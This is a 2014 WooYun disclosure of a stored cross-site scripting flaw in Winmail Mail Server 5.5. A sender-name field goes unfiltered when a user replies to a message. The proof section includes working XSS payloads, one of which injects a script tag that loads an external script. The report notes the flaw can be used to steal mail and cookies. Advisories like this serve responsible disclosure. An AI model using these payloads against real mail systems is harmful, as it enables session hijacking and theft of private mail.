当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-079201

漏洞标题:winmail邮件系统存储型跨站

相关厂商:winmail

漏洞作者: 路人甲

提交时间:2014-10-22 12:00

修复时间:2014-12-06 12:02

公开时间:2014-12-06 12:02

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:12

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-10-22: 细节已通知厂商并且等待厂商处理中
2014-10-27: 厂商已经确认,细节仅向厂商公开
2014-11-06: 细节向核心白帽子及相关领域专家公开
2014-11-16: 细节向普通白帽子公开
2014-11-26: 细节向实习白帽子公开
2014-12-06: 细节向公众公开

简要描述:

winmail最近刚刚升级为最新版本,但系统存在一处XSS漏洞,利用该漏洞,我们可以盗取任意用户邮件内容和COOKIE信息,以及进行一些其他恶意操作。

详细说明:

1、涉及版本:Winmail Mail Server5.5
2、winmail邮件系统对发件人字段进行了过滤,但是在回复邮件时,系统会重新读取发件人,系统重新读取后,并没有对发件人字段进行过滤,导致存储型XSS的触发。
3、系统演示站点:http://demo.magicwinmail.com:6080/

漏洞证明:

1、登录系统--》配置箱--》使用偏好,将发件人名字改为<img src=x onerror=alert(/xss/)>

1.png


2、发送邮件给被攻击者,被攻击用户登录邮件系统,查看邮件,系统对发件人字段已经进行了过滤,点击"回复"或"回复所有",漏洞触发:

2.png


3.png


3、使用Firebug查看页面源代码:

4.png


onerror事件成功执行,漏洞存在点为图中红色区域处。

6.png


4、在使用偏好处将发件人名字修改为:<img src=x onerror=d=document;e=d.createElement('script');e.src='http://127.0.0.1/eXploit.js';d.body.appendChild(e);>
回复时漏洞触发,成功加载本地脚本:

5.png


通过修改脚本内容,我们可以进行针对性的攻击。

修复方案:

回复邮件时,对发件人字段进行过滤。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2014-10-27 09:47

厂商回复:

最新状态:

暂无